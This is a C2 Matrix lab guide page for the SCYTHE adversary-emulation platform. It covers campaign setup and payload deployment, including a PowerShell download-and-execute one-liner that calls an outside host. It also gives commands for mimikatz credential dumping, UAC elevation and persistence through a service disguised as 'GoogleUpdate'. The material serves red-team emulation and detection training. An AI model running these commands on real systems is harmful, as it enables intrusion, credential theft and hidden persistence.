C2 Matrix
Search…
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix VM
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered By GitBook
SCYTHE

Setup Campaign

Login to your SCYTHE instance via web browser. Default port is 8443.
​https://localhost:8443​
Campaign Manager - New Campaign
Select the following options:
  • Name: unique name for the campaign
  • Target Operating System: Windows, Linux, or macOS
  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
  • Communication Module:
    • HTTPS is default,
    • DNS, HTTP, and Stego require relays to be installed on redirector
    • Google Sheet and Twitter require third party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats​
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import
Migrate Threats
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute by double clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download DLL file from SCYTHE and execute below from a cmd.exe:
1
rundll32.exe ServiceLogin.dll,PlatformClientMain
Copied!

Command and Scripting Interpreter: PowerShell (T1059.001)

Open a powershell.exe and run:
1
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;
Copied!

Emulate TTPs

1
loader --load run
2
run whoami
3
run cmd /c whoami
Copied!

Load Python Runtime

1
loader --load-runtime python3
2
list modules
3
loader --load "modulename"
4
"modulename"
Copied!

Download files

Move file to virtual file system
1
loader --load downloader
2
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll
Copied!

Privilege Escalation (TA0004)

UAC (T1088)

1
loader --load elevate
2
elevate --prompt
Copied!

Credential Access (TA0006)

Credential Dumping (T1003)

1
loader --load mimikatz
2
mimikatz --arglist privilege::debug
3
mimikatz --arglist sekurlsa::logonPasswords
Copied!

Persistence (TA0003)

New Service (T1050)

1
loader --load persist
2
​
3
Synatax:
4
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
5
​
6
Example:
7
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe
Copied!

Scheduled Task (T1168)

1
schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"
Copied!

Clean up

Persistence:

1
run sc delete GoogleUpdate
2
run del C:\Windows\Temp\GoogleUpdate.exe
Copied!

Kill agent:

1
controller --shutdown
Copied!
C2 - Previous
Sliver
Next - C2
TrevorC2
Last modified 1yr ago
Copy link
Contents
Setup Campaign
Community Threats (Third Party Adversary Emulation Plans)
Deploy Payload
User Execution: Malicious File (T1204.002):
Signed Binary Proxy Execution: Rundll32 (T1218.011):
Command and Scripting Interpreter: PowerShell (T1059.001)
Emulate TTPs
Load Python Runtime
Download files
Privilege Escalation (TA0004)
Credential Access (TA0006)
Persistence (TA0003)
Clean up
Persistence:
Kill agent: